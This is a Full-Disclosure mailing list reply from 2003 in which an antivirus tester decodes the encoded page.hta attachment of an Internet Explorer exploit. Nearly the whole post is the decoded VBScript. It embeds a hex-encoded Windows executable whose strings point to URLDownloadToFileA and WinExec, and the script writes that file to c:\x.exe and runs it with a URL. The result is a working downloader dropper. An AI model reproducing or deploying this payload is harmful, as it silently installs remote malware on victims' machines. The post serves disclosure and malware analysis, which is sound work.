Full Disclosure mailing list archives
Re: IE Object Type Validation Vulnerability Exploit
From: Andreas Marx <amarx () gega-it de>
Date: Tue, 16 Sep 2003 13:14:29 +0200
Hi!
look at page.hta attachment?
Decrypted (undo VBS.Encode) it is the following: ---start---szZeroLine = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
szBinary = ""szBinary = szBinary & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000" szBinary = szBinary & "000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F" szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005D87017219E66F2119E66F2119E66F21" szBinary = szBinary & "97F97C2112E66F21E5C67D2118E66F215269636819E66F2100000000000000000000000000000000504500004C010300" szBinary = szBinary & "AB93493F0000000000000000E0000F010B01050C00020000000400000000000000100000001000000020000000004000" szBinary = szBinary & "001000000002000004000000000000000400000000000000004000000004000000000000020000000000100000100000" szBinary = szBinary & "000010000010000000000000100000000000000000000000182000002800000000000000000000000000000000000000"
szBinary = szBinary & szZeroLineszBinary = szBinary & "000000000000000000000000000000000020000018000000000000000000000000000000000000000000000000000000" szBinary = szBinary & "2E7465787400000064000000001000000002000000040000000000000000000000000000200000602E72646174610000" szBinary = szBinary & "BE000000002000000002000000060000000000000000000000000000400000402E646174610000002700000000300000" szBinary = szBinary & "0002000000080000000000000000000000000000400000C0000000000000000000000000000000000000000000000000" szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine szBinary = szBinary & "00000000000000000000000000000000E8470000006683C00A8D08516800304000E842000000680B30400050E8310000" szBinary = szBinary & "00596A006A008D1D1E30400053516A00FFD06A01681E304000E8200000006A00E801000000CCFF2510204000FF250020" szBinary = szBinary & "4000FF2504204000FF2508204000FF250C20400000000000000000000000000000000000000000000000000000000000" szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine szBinary = szBinary & "66200000782000008A2000009A2000005820000000000000402000000000000000000000A42000000020000000000000" szBinary = szBinary & "0000000000000000000000000000000066200000782000008A2000009A20000058200000000000008000457869745072" szBinary = szBinary & "6F6365737300C800476574436F6D6D616E644C696E6541001F0147657450726F63416464726573730000A4014C6F6164" szBinary = szBinary & "4C696272617279410000940257696E45786563006B65726E656C33322E646C6C00007573657233322E646C6C00000000" szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine szBinary = szBinary & "000000000000000000000000000000000000000000000000000000000000000075726C6D6F6E2E646C6C0055524C446F" szBinary = szBinary & "776E6C6F6164546F46696C654100633A5C792E6578650000000000000000000000000000000000000000000000000000" szBinary = szBinary & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine & szZeroLine
szBinary = szBinary & "00000000000000000000000000000000" szApplication = "c:\x.exe" Set hFSO = CreateObject("Scripting.FileSystemObject") Set hFile = hFSO.CreateTextFile(szApplication, ForWriting) intLength = len(szBinary) intPosition = 1 while intPosition < intLength char = Int("&H" & Mid(szBinary, intPosition, 2)) hFile.Write(Chr(char)) intPosition = intPosition+2 wend hFile.Close Set hShell=CreateObject("WScript.Shell") hShell.run(szApplication+" "+szURL) ---stop--- cheers, Andreas -- Andreas Marx <amarx () gega-it de>, http://www.av-test.org GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany Phone: +49 (0)391 6075466, Fax: +49 (0)391 6075469 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Blocking Music Sharing., (continued)
- Re: Blocking Music Sharing. David Loyd (Sep 15)
- Re: Blocking Music Sharing. Jedi/Sector One (Sep 15)
- Re: Blocking Music Sharing. David Loyd (Sep 15)
- Re: Blocking Music Sharing. Dimitri Limanovski (Sep 15)
- Re: Blocking Music Sharing. srenna (Sep 15)
- RE: Blocking Music Sharing. Todd Mitchell - lists (Sep 15)
- Re: Blocking Music Sharing. Scott Manley (Sep 15)
- Re: Blocking Music Sharing. srenna (Sep 15)
- RE: Blocking Music Sharing. Bergeron, Jared (Sep 15)
- IE Object Type Validation Vulnerability Exploit n30 (Sep 15)
- Re: IE Object Type Validation Vulnerability Exploit phlox (Sep 15)
- Re: IE Object Type Validation Vulnerability Exploit n30 (Sep 15)
- Re: IE Object Type Validation Vulnerability Exploit Andreas Marx (Sep 16)
- Re: IE Object Type Validation Vulnerability Exploit Cael Abal (Sep 16)
- Re: IE Object Type Validation Vulnerability Exploit morning_wood (Sep 18)
- Re: IE Object Type Validation Vulnerability Exploit Cael Abal (Sep 18)
- IE Object Type Validation Vulnerability Exploit n30 (Sep 15)
- Re: Blocking Music Sharing. Sam Baskinger (Sep 16)
- Re: Blocking Music Sharing. morning_wood (Sep 18)
- Re: Blocking Music Sharing. Azerail (Sep 18)
- Re: Blocking Music Sharing. Cael Abal (Sep 15)
- Re: Blocking Music Sharing. Ron DuFresne (Sep 16)